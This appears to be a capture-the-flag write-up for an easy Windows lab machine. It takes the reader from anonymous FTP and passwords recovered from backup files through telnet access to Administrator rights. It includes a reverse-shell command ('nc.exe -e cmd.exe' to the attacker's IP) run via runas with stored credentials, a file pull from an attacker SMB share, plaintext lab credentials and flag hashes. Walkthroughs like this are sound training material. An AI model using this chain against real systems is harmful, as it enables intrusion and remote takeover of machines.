This is an easy windows box
Tools used
- 7z
- copy
- ftp
- less
- nc
- nmap
- powerless
- runas
- smbserver
- strings
- telnet
Reconnaissance
Nmap
nmap -sC -sV -oA access 10.10.10.98 -v
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Here’s what nmap teaches us :
- port 21 (FTP) - Anonymous login
- port 23 (TELNET)
- port 80 (HTTP) - IIS 7.5
Since I have anonymous access to the FTP, let’s use them :
ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:liodeus): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
08-23-18 09:16PM <DIR> Backups
08-24-18 10:00PM <DIR> Engineer
There is two directories :
- Backups
- Engineer
ftp> cd Backups
ftp> ls
08-23-18 09:16PM 5652480 backup.mdb
ftp> get backup.mdb
ftp> cd Engineer
ftp> ls
08-24-18 01:16AM 10870 Access Control.zip
ftp> get "Access Control.zip"
I downloaded two files from the two directories :
- backup.mdb
- Access Control.zip
I tried to unzip the file but it’s protected by a password ! Maybe it’s in the backup.mdb, to check for that I used the command strings and I got throught the output line by line looking for something that look like a password :
strings backup.mdb | less
[...]
access4u@security
[...]
There was a lot of gibberish strings but one stands out : access4u@security, let’s try it as password for the protected zip :
7z e Access\ Control.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.utf8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)
Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870
Nice that was the password ! I now have a file name “Access Control.pst”, looking on google how to open this file, I found this pst viewer who let you open it in the browser.
I now have credentials :
login = security
password = 4Cc3ssC0ntr0ller
But where do I use them ?
Go see the website :
There is nothing here and what about the telnet port :
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login:
Exploit
It’s asking for a login, let’s try them here :
telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security
I’m connected nice ! It’s time to enumerate, first launch a smbserver for file transfert :
sudo smbserver.py -smb2support liodeus ./
Then I used Powerless.bat, because .exe wouldn’t works :
\\10.10.14.4\liodeus\Powerless.bat
The interesting part is here :
-- Stored Passwords --
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Nice the credentials of Administrator are stored, so I can use the command runas as him ! Let’s get a reverse shell as Administrator, first upload nc on the box :
copy \\10.10.14.4\liodeus\nc.exe .
Launch a nc listener :
nc -lvp 1234
Then run the command runas with the stored credentials :
runas /savecred /user:administrator "nc.exe -e cmd.exe 10.10.14.4 1234"
Go see the listener :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.98: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.98] 49168
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\administrator
Voila, I now have the Administrator rights and can read the flags.
Flags
User.txt
C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38
Root.txt
C:\Users\Administrator\Desktop>type root.txt
type root.txt
6e1586cc7ab230a8d297e8f933d904cf